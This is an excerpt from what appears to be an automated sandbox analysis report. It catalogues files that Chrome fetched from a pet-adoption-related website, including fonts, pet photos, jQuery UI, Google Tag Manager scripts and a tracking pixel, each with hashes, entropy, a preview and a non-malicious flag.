                                                                                                                                                                                                                                                        Entropy (8bit):5.364795551026935
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:jOS0adcJc+ufOS0ad5NkOEadcJc+ufOEad5NkOXadcJc+ufOXad5NkOwhadcJc+u:5peYpheDye89eHO
                                                                                                                                                                                                                                                        MD5:FBC68023872441F5DC0ECC68259AD318
                                                                                                                                                                                                                                                        SHA1:1C2CF2A66F160BE97664CDE64CE8D286FD04749B
                                                                                                                                                                                                                                                        SHA-256:2334520A0F31BEB93C367E3052FFCC882510B24FDDAE873156BE148B9C5DADE0
                                                                                                                                                                                                                                                        SHA-512:EC7AC7FAA2681E5E2A81FDA80AA4C9CDF15FDD1722142F7F129F0E0E38EA3C41D102B20E360D61A595C0F1D59F12181EB493048FD1F74C05C4A18CDEC57B9812
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:"https://fonts.googleapis.com/css?family=DM+Sans:400,800,500,100&subset=latin&display=swap"
                                                                                                                                                                                                                                                        Preview:/* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu6-K6h9Q.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 100;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dmsans/v15/rP2Yp2ywxg089UriI5-g4vlH9VoD8Cmcqbu0-K4.woff2) format('woff2');. unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;.}./* latin-ext */.@font-face {. font-family: 'DM Sans';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):95
                                                                                                                                                                                                                                                        Entropy (8bit):4.347811435468635
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/Y3WlED//jp:6v/lhPfkCDtmywFghu3WlEDTp
                                                                                                                                                                                                                                                        MD5:71A50DBBA44C78128B221B7DF7BB51F1
                                                                                                                                                                                                                                                        SHA1:0EC63B140374BA704A58FA0C743CB357683313DD
                                                                                                                                                                                                                                                        SHA-256:3EB10792D1F0C7E07E7248273540F1952D9A5A2996F4B5DF70AB026CD9F05517
                                                                                                                                                                                                                                                        SHA-512:6AD523F5B65487369D305613366B9F68DCDEEE225291766E3B25FAF45439CA069F614030C08CA54C714FDBF7A944FAC489B1515A8BF9E0D3191E1BCBBFE6A9DF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://pixel.tapad.com/idsync/ex/receive/check?partner_id=2499&partner_device_id=8b05cf9f-7156-4e8e-80d8-30a255c1b07a-677f2d75-5553
                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 14, xresolution=198, yresolution=206, software=18.1.1, datetime=2024:12:21 14:54:58, hostcomputer=iPhone 14, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):47957
                                                                                                                                                                                                                                                        Entropy (8bit):7.890678235075945
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:7jML3qvcfF+Lthr/4Olwcuqou2RfMvCFbia/rLRU0LWqJAvbsiFkq4G8TlRlyqxh:kL34YF+zrEcf2hM6QaO0LhJON8xSjc
                                                                                                                                                                                                                                                        MD5:CB56E12F6250F7B50FAAD6AF79DB0CF0
                                                                                                                                                                                                                                                        SHA1:2F3FBEE0265399AD399A0D86DFA65189AB642BE7
                                                                                                                                                                                                                                                        SHA-256:7A986F4A84562C8A7E6F76BAA2162A0C3A1757856E0DD0626D0EE22743F58575
                                                                                                                                                                                                                                                        SHA-512:641194601C26A49B186F1C5410554CC79E277958312C70059A628CBE18CEAF278C320AB6B2A81695B28581CA8F2CEB8E0271CE3E1016E345E3FA12CE8CA49FAC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://g.petango.com/photos/352/7a6849d0-0cb7-4f2e-a0e6-146335e8af7b.jpg
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H.....QExif..II*...................(.......................................................................1...........2...........<...................................i...........%.......(.......Apple.iPhone 14.H.......H.......18.1.1.2024:12:21 14:54:58.iPhone 14.H.......H......."."...........'.......}...........0232............................................430.........430.........0100....................................................................................................................................2...........3...........4...$...................................................,...........@...........H...........P...........X...........`...........h...|.......p.......-05:00.-05:00.-05:00.i+..O...i+..O...................Apple.iPhone 14 front camera 2.69mm f/1.9.....<...........2024:12:21 14:54:58.2024:12:21 14:54:58......%...J..[(.......I..............d...........Apple iOS...MM.0.......................T.......h...T......................................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):403
                                                                                                                                                                                                                                                        Entropy (8bit):4.849159630908851
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:UhnDiM8HMOXKSzEfT+/RFv132FupxJ/eHFEqlRS5kPmXDn:ED+Hh6Sz6cRFV2Fu/J/eHJS5k+Tn
                                                                                                                                                                                                                                                        MD5:FE70FB86BA315B5054A6E491A2B7262C
                                                                                                                                                                                                                                                        SHA1:53BE81E47E5D5189790ACD3F0887F8D0B1D70D51
                                                                                                                                                                                                                                                        SHA-256:F85910E3AD8B458C99D1C424CE0B17D8AA88DBA69AEDC1598BD17E8823487CC9
                                                                                                                                                                                                                                                        SHA-512:D92676DC0B6C263092E034686E9883DB8740D047A58721EEF4C2095C89B1B4B43AD0872935BA4128A15330E4735072B7E1A47E9CA3D04A833914110FFFFED4D9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://149955744.v2.pressablecdn.com/wp-content/themes/indy-humane/style.css?ver=1.0
                                                                                                                                                                                                                                                        Preview:/*.Theme Name: Indy Humane Based on Thrive.Theme URI: http://thrivethemes.com/.Version: 1.0.Author: <a href="http://www.thrivethemes.com">Thrive Themes</a>.Description: Fully customizable, front end theme and template editing for WordPress has arrived! .Template: thrive-theme.Tags: custom-background, custom-logo, custom-menu, featured-images, threaded-comments, translation-ready, custom-everything.*/
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10020)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):10199
                                                                                                                                                                                                                                                        Entropy (8bit):5.0255490240459695
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:sr91gNsoBeuLLE2mBrnYgfGGFTsPdQlJh1NmgKzH:srkjMunE7x/3sPd469
                                                                                                                                                                                                                                                        MD5:284953F0E0A570AA06D6B527C45A55BB
                                                                                                                                                                                                                                                        SHA1:C4B8089261F001829F0D6E522928F6D912DB7D1F
                                                                                                                                                                                                                                                        SHA-256:41788F27F61AAB4174275EB5FBBBCAFFDE0F4F0F07E6900592AFFAD38E09B154
                                                                                                                                                                                                                                                        SHA-512:81D15D80BBF4F8703E644157D74F8F44EEA10E13553947437F14E9E448084D3B9A704CF87DBE0CC99D228A39820CE122A226973FA543DA3C84FF70A8F504C51A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:/*!. * jQuery UI Menu 1.13.3. * https://jqueryui.com. *. * Copyright OpenJS Foundation and other contributors. * Released under the MIT license.. * https://jquery.org/license. */.!function(e){"use strict";"function"==typeof define&&define.amd?define(["jquery","../keycode","../position","../safe-active-element","../unique-id","../version","../widget"],e):e(jQuery)}(function(a){"use strict";return a.widget("ui.menu",{version:"1.13.3",defaultElement:"<ul>",delay:300,options:{icons:{submenu:"ui-icon-caret-1-e"},items:"> *",menus:"ul",position:{my:"left top",at:"right top"},role:"menu",blur:null,focus:null,select:null},_create:function(){this.activeMenu=this.element,this.mouseHandled=!1,this.lastMousePosition={x:null,y:null},this.element.uniqueId().attr({role:this.options.role,tabIndex:0}),this._addClass("ui-menu","ui-widget ui-widget-content"),this._on({"mousedown .ui-menu-item":function(e){e.preventDefault(),this._activateItem(e)},"click .ui-menu-item":function(e){var t=a(e.target),i=a(a.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (5268)
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):329034
                                                                                                                                                                                                                                                        Entropy (8bit):5.575717786400442
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6144:jEXy+3IsyjHudSVQF6STnhsGP5H0uGDhNcvnzHVP:jEzItDudbkuGDfiTd
                                                                                                                                                                                                                                                        MD5:CCD9D4D85C38C7CBDF58470298471578
                                                                                                                                                                                                                                                        SHA1:84106E81B6BD9DB7C9EC2D7FBA4D08F39CB39E68
                                                                                                                                                                                                                                                        SHA-256:EB8A090B61FD53679F3E72BD5759663669CF5665F235ECDBF3BE5FC9074B350B
                                                                                                                                                                                                                                                        SHA-512:578295C160A2D29E1AD0E8BF3C1A69930E5C046E69A0A2187751419A3887788761785C0D6272F1A9104BDE65AC7B31A13BD88B0F9B1827C0B6DB178A3D16D27F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://www.googletagmanager.com/gtag/js?id=G-CDQ7BLPKF7&l=dataLayer&cx=c&gtm=45He5170v9202031467za200
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):57711
                                                                                                                                                                                                                                                        Entropy (8bit):7.975682214638221
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:wP+ZnS32yZYo3ZezU98eBLGxJTPyD3+SsG:1+2ooUGgLGxRPyCSsG
                                                                                                                                                                                                                                                        MD5:A09290B4394B5FCC414DA5525CC90C87
                                                                                                                                                                                                                                                        SHA1:919C6D1A419C2FAB26AC4D0F6A5C95E0AEE45F19
                                                                                                                                                                                                                                                        SHA-256:312B0C1D9D39915AEC3C7486FCBC4E2AF22FE3B2941984496237D511DBEA09C3
                                                                                                                                                                                                                                                        SHA-512:2A9FF42CDE6685B79F2D0CB332D63E1F4C2D7F1A8A47C625E1172DC79AD90C93E5CA8B95A427CC4E0EC3794680B5CF4FAE6572E6938EF41B6776F4B9C47DCBE8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(.w....~....z...c....?..`}.....4.......jS..q\...!....s.).u&&..)6..>.G.f..G0r......N..5...~.)~......t....:U........I..z|..t....R.M..k....(.`...\.J....i...<...{....9...)..h....R..H.c........u.>p..=...M4.....`..w....`..o#..............f{..+...!>..*..3...^.S..>`..5..4...X.k...`....3...=.a..1.8_.j9...\.?x...z.Q.."....).q:..:).y.....(.`..s...p..7..X.l....k.....n..h.J.1.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=14, orientation=upper-left, resolutionunit=2, manufacturer=Apple, model=iPhone 14, xresolution=198, yresolution=206, software=18.1.1, datetime=2024:12:21 14:54:58, hostcomputer=iPhone 14, xresolution=251, yresolution=259, GPS-Data], baseline, precision 8, 420x420, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):47957
                                                                                                                                                                                                                                                        Entropy (8bit):7.890678235075945
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:7jML3qvcfF+Lthr/4Olwcuqou2RfMvCFbia/rLRU0LWqJAvbsiFkq4G8TlRlyqxh:kL34YF+zrEcf2hM6QaO0LhJON8xSjc
                                                                                                                                                                                                                                                        MD5:CB56E12F6250F7B50FAAD6AF79DB0CF0
                                                                                                                                                                                                                                                        SHA1:2F3FBEE0265399AD399A0D86DFA65189AB642BE7
                                                                                                                                                                                                                                                        SHA-256:7A986F4A84562C8A7E6F76BAA2162A0C3A1757856E0DD0626D0EE22743F58575
                                                                                                                                                                                                                                                        SHA-512:641194601C26A49B186F1C5410554CC79E277958312C70059A628CBE18CEAF278C320AB6B2A81695B28581CA8F2CEB8E0271CE3E1016E345E3FA12CE8CA49FAC
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....H.H.....QExif..II*...................(.......................................................................1...........2...........<...................................i...........%.......(.......Apple.iPhone 14.H.......H.......18.1.1.2024:12:21 14:54:58.iPhone 14.H.......H......."."...........'.......}...........0232............................................430.........430.........0100....................................................................................................................................2...........3...........4...$...................................................,...........@...........H...........P...........X...........`...........h...|.......p.......-05:00.-05:00.-05:00.i+..O...i+..O...................Apple.iPhone 14 front camera 2.69mm f/1.9.....<...........2024:12:21 14:54:58.2024:12:21 14:54:58......%...J..[(.......I..............d...........Apple iOS...MM.0.......................T.......h...T......................................
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):39389
                                                                                                                                                                                                                                                        Entropy (8bit):7.976852572796149
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:wAVhx5jinWFTR7Y0wuNLr1p76yspIKsrl2tQFQpcb4YGYe+DoCVf9NcDLRpW:wex5KW/PpLr1YysWP2T1UvJvcA
                                                                                                                                                                                                                                                        MD5:9D09830B986C482CD3AFED2F815C7C76
                                                                                                                                                                                                                                                        SHA1:D2A05D5839E661B8C817D5AC3B3E1551DB704A16
                                                                                                                                                                                                                                                        SHA-256:0B5987A6BFEA516130A198F70C097F1DDC40A8046D08867DB13C078ACB2659D2
                                                                                                                                                                                                                                                        SHA-512:47CEE1F8BFB47CE2A659D6E3E0C1D9E66A07A938887DF2808FFF1A288B5A441809BDB6E2F1C0E37004D6903657BF1E8D83697DD7770C6855F7D58F6D31A2B83E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....,.,..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..)..#.iZ.;Hq.n*f^x...B...S...f....."&.I..J.t..>..B{.i..M4..sM".z.M....y.v....a.M.8.M<..8....@.y..O.I....7...M4....h&....%..*L...:.GZ..(..-...@.Os..]s....@......?..L.;.1@.....R..:(&..Z.....3.)sGZ..(4......p4.J(..)...N...P.8p))....~i..P..)....=E!...........1.N9....ps..G.!...a..H..#.."5..53/.4..B..0..4.0(..Z..v...Xb....H9.Hi.."$.MHi.....a...FM.!.M".M2.....4..M.....I.RS.R..f....SI.
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 420x560, components 3
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):66989
                                                                                                                                                                                                                                                        Entropy (8bit):7.9760589202963885
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:1536:w8S4vYQgNpDiCpUWXkaCpUV9TLh1vlaU/NjWhHngsuLjs7bRvt:BBvpqU2kaC2LhjaAAngNat
                                                                                                                                                                                                                                                        MD5:C5AF9181D32057971283EB2E129E1320
                                                                                                                                                                                                                                                        SHA1:D29B957B2230BD95289D6CD2CA4BA5C6011EC7AB
                                                                                                                                                                                                                                                        SHA-256:41D4F3DCE983AF12342CDCB8F1CB7CF26A967C3C006E2EA3C9082884042493FD
                                                                                                                                                                                                                                                        SHA-512:6E5610F68834704FED4C47773176A49613EDC516E6C8ACB7E3B60B4FEF1181E0E5F93FEC5128E4C6E4381E4832886569CE02457EA0A78BE23D5C7562FC323A7E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`..............................................................................................................................................0...."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..+|}....Q..Tvg62.@;.TJ..\.;...q....qUD.9..0..j........X....t..'.S,.....Y.x9.L...}+<....O.t.Z^.qHO$.=kB.....8.8...j.2..4t6..2+V'...Z.+..R.Q.=*....)Y`l.A.../...drC....<g;5....b.i..5..q.pG...].M.;..........k..0G....~{|.o........~..Nb...v.........pw.V.U.w....U....S.j....=....w..WA.........@A.X..8......@.F..'=:U.p>by..:..1..QF}i..{..1..W.g.....;..*q...f..<P..F.J..9....x?6qU..*..s
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2310)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):205072
                                                                                                                                                                                                                                                        Entropy (8bit):5.530283558993649
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:qTK2+EG+3Iw/xHzdrs0bLQ1A5yCOA7LbpexKonhsGf8WH:my+3IsxHCSVMKonhsGj
                                                                                                                                                                                                                                                        MD5:939C3EC04D609394617431C9E00D239C
                                                                                                                                                                                                                                                        SHA1:908856F3989FC28B87B57BB9342892894F185471
                                                                                                                                                                                                                                                        SHA-256:2EB6A8D57643D857F1D7F204B60E9E869C414381587461E2B96586AD6F87DEEB
                                                                                                                                                                                                                                                        SHA-512:980B9EA88872DBB1B158AFCE8FBA089C393D6EC4F7D7A48F2D6B73D03C6E485BB1B93929F14A25760ECC6AEBB7C03F84CEAA9798683C67BAE50F4CC72A27B61B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":"\n\u003Cscript type=\"text\/gtmscript\"\u003E!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version=\"2.0\",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,\"script
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                                                                                                        Entropy (8bit):4.8255640636718775
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:Hd1X7Zgpn1ICnmBk01n:f7Zgp1/az
                                                                                                                                                                                                                                                        MD5:7E9F459FCF04A55E816EC95052654D47
                                                                                                                                                                                                                                                        SHA1:2BEAB2B60DCBBE751FBFF6D2F2B63643443CE37E
                                                                                                                                                                                                                                                        SHA-256:C5ABC8DB4CE2E327B925B6E579C2DF1B288095BEEE04AC0D730909E82E706F0D
                                                                                                                                                                                                                                                        SHA-512:C431FFAB542766D929D8BC52A2A86A9544AE90988CA23FA594A15DAFA764419BAE949827DB3BACBDAD6242D2EADA671CF7B3F96360F2CB7D526FA9E5F396889F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAmLXBQvNXCc_xIFDRM0Cs4SHglU1okau4jdfRIFDW13oeISBQ1PiGCfEgUNCZizJw==?alt=proto
                                                                                                                                                                                                                                                        Preview:CgkKBw0TNArOGgAKJwoLDW13oeIaBAgDGAEKCw1PiGCfGgQIBRgBCgsNCZizJxoECAkYAQ==
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):203
                                                                                                                                                                                                                                                        Entropy (8bit):5.139523437629011
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                                                                                                                                                                                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                                                                                                                                                                                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                                                                                                                                                                                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                                                                                                                                                                                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2827)
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):239594
                                                                                                                                                                                                                                                        Entropy (8bit):5.542495843972844
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:kBK2+EG+3Iw/xH4Drs0Q2Q1A5yCOA7LF0pzxKonhsGS3TGIVWH:ey+3IsxHJSVoKonhsGSQ
                                                                                                                                                                                                                                                        MD5:E5062FE75D3CF16B258EDE74865AE8C2
                                                                                                                                                                                                                                                        SHA1:49BAB60E01AFB9E9776D769C33A2B416E5F2F864
                                                                                                                                                                                                                                                        SHA-256:233A01CD803240108A7D58DAE7C948FE4C257F0399E5417012AEF31434053A5C
                                                                                                                                                                                                                                                        SHA-512:95F4DDA1671DC941897BF73D7457B7E346A5151CD282A95AC0985E86B4C9B9295F823B34DD7D23C62D502D8D98D67DCF9EEBA17F49B7972049570646FC1F36E4
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                        Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"7",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":"UA-57291413-5"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"},{"function":"__v","vtp_name":"gtm.element","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.elementId","vtp_dataLayerVersion"
                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (29501), with no line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):29501
                                                                                                                                                                                                                                                        Entropy (8bit):5.173139697059351
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:FbfCZGcAB6iWymYuetZLYCYe7hW1rdEQcrgTF5ze8jYNtgLb//uMY4y+SUZdqcGA:JXndru5y8kHgLb//uM1SUZQzhpE
                                                                                                                                                                                                                                                        MD5:061B20917125682AC1396F1018F41A84
                                                                                                                                                                                                                                                        SHA1:A789F95AB8673B4DAA749D7F83BAB46ED3CED610
                                                                                                                                                                                                                                                        SHA-256:5413E060628A380610101BCBB4372B77FD4B6DFE7EBC91DC09E0C17C75382EBD
                                                                                                                                                                                                                                                        SHA-512:126CC43CF128DB7062EF685D1382A2186EEB0700769654600A7CE0E8973F88C36538FFB611B0CBA338161B714DF42D5B6CB1FE788F1554DF9A7D707322255288
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Reputation:low
